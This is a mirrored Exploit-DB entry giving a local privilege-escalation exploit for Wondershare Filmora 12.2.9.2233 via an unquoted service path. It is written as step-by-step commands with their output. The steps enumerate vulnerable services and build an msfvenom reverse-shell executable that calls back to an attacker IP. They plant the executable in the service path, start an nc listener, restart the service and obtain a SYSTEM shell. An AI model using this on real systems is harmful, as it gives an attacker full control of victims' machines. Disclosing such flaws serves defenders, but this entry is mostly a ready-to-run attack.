6
[local] Wondershare Filmora 12.2.9.2233 - Unquoted Service Path
source link: https://www.exploit-db.com/exploits/51395
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
############################################################################
# #
# Exploit Title: Wondershare Filmora 12.2.9.2233 - Unquoted Service Path #
# Date: 2023/04/23 #
# Exploit Author: msd0pe #
# Vendor Homepage: https://www.wondershare.com #
# My Github: https://github.com/msd0pe-1 #
# #
############################################################################
Wondershare Filmora:
Versions =< 12.2.9.2233 contains an unquoted service path which allows attackers to escalate privileges to the system level.
[1] Find the unquoted service path:
> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Wondershare Native Push Service NativePushService C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe Auto
[2] Get informations about the service:
> sc qc "NativePushService"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: NativePushService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Native Push Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
[3] Generate a reverse shell:
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Wondershare.exe
[4] Upload the reverse shell to C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare.exe
> put Wondershare.exe
> ls
drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 .
drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 ..
drw-rw-rw- 0 Sun Apr 23 14:36:26 2023 Wondershare Filmora Update
drw-rw-rw- 0 Sun Apr 23 14:37:13 2023 Wondershare NativePush
-rw-rw-rw- 7168 Sun Apr 23 14:51:47 2023 Wondershare.exe
drw-rw-rw- 0 Sun Apr 23 13:52:30 2023 WSHelper
[5] Start listener
> nc -lvp 4444
[6] Reboot the service/server
> sc stop "NativePushService"
> sc start "NativePushService"
OR
> shutdown /r
[7] Enjoy !
192.168.1.102: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK